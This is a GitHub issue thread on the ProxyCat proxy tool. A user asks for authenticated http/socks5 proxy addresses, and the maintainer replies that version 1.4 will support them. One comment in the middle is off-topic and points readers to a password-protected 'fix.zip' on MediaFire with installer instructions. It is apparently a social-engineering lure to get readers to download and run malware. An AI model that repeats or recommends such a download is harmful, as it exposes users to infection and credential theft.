### ISSUE TITLE
小小需求，代理池地址增加身份校验

### ISSUE THREAD

**Issue by baimasi** [honmashironeko/ProxyCat#11]
代理地址IP.txt 支持带身份校验的http/socks
socks5://user:password@localhost:1080
http://user:password@localhost:1080

**Comment by honmashironeko** [comment]
建议直接通过白名单的的方式使用，带有身份校验容易请求失败

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by honmashironeko** [comment]
已更新，1.4 版本将支持代理地址身份验证
